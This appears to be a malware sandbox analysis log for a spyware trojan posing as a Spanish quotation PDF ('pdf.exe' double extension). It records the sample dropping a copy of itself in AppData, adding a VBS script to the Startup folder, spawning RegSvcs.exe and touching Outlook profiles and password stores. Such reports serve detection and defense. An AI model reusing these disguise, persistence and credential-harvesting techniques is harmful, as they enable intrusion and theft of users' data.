Source: 2.2.palladiums.exe.3880000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, -2.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, -2.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002737B5 GetLastError,FormatMessageW,

0_2_002737B5

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002610BF AdjustTokenPrivileges,CloseHandle,	0_2_002610BF
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_002616C3
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_005510BF AdjustTokenPrivileges,CloseHandle,	2_2_005510BF
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_005516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_005516C3

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002751CD

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0028A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0028A67C

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0027648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0027648E

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_002042A2

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

File created: C:\Users\user\AppData\Local\silvexes

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\autF13.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002E28000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

ReversingLabs: Detection: 66%

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

File read: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Process created: C:\Users\user\AppData\Local\silvexes\palladiums.exe "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\silvexes\palladiums.exe "C:\Users\user\AppData\Local\silvexes\palladiums.exe"
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\silvexes\palladiums.exe"
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Process created: C:\Users\user\AppData\Local\silvexes\palladiums.exe "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\silvexes\palladiums.exe "C:\Users\user\AppData\Local\silvexes\palladiums.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\silvexes\palladiums.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Static file information: File size 1131008 > 1048576

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: palladiums.exe, 00000002.00000003.2157427033.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2157794199.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2319100911.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2318484844.0000000003800000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: palladiums.exe, 00000002.00000003.2157427033.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2157794199.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2319100911.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2318484844.0000000003800000.00000004.00001000.00020000.00000000.sdmp

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002042DE

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00220A76 push ecx; ret	0_2_00220A89
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00510A76 push ecx; ret	2_2_00510A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C891E pushad ; iretd	3_2_027C891F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C8C2F pushfd ; iretd	3_2_027C8C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C8DDF push esp; iretd	3_2_027C8DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B58A45 push es; ret	7_2_06B58A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5942D push edi; ret	7_2_06B5942E

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	File created: \nuevo pedido de cotizaci#u00f3n 663837 4899272.pdf.exe
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	File created: \nuevo pedido de cotizaci#u00f3n 663837 4899272.pdf.exe			Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

File created: C:\Users\user\AppData\Local\silvexes\palladiums.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0021F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0021F98E
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00291C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00291C41
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0050F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_0050F98E
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00581C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00581C41

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
